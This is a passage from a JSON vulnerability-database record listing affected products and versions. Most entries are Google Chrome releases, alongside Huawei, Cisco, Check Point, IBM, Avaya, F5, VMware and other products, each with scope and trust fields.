rh2485 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1655.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.707.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.76" }, { "model": "secureplatform r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "algo one managed data service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1011.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1067.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "oceanstor vis6600 v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.801.0" }, { "model": "nexus running nxos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1048.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.807.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.865.0" }, { "model": "espace cad v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.481.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.489.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.9" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.55" }, { "model": "ipso r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.97" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "elog v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.69" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.50" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.510" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.96" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77750" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "ipso r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.786.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.20" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.59" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1039.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.836.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.23" }, { "model": "oceanstor dorado2100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.1" }, { "model": "ace application control engine module for the cisco catalyst", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "6500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.591.0" }, { "model": "flex system 40gb ethernet", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.107" }, { "model": "secureplatform ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.278.0" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.413.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.95" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.67" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.580.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.146" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.4" }, { "model": "chrome", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.513.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.30" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1042" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.158.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.1" }, { "model": "oceanstor sns2120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.30" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.765.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.553.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.494.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.745.0" }, { "model": "ipso r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.484.0" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.52" }, { "model": "oceanstor cse v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.829.1" }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.35" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.482.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.32" }, { "model": "aura communication manager ssp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ipso r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.76" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.677.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.770.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.364.0" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "c-series nexus 5k switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.349.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.69" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.37" }, { "model": "workbench", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.15" }, { "model": "system storage san48b-5 2498-f48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "gaia r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.83" }, { "model": "gaia r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7845" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.63" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1297.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1026" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.33" }, { "model": "secureplatform r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.10" }, { "model": "fusionstorage dsware v100r003c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.1" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "secureplatform r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.3.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.1" }, { "model": "websphere process server hypervisor edition for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.884.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1038" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.621.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.310" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.14" }, { "model": "espace v1300n v1300n v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.36" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "puredata system for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1006" }, { "model": "smartcloud provisioning fixpack interi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.14" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.811.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.709.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.43" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.54" }, { "model": "oceanstor uds v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.882.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "enterprise linux eus 5.9.z server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.384.0" }, { "model": "secureplatform r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.19" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.44" }, { "model": "power hmc 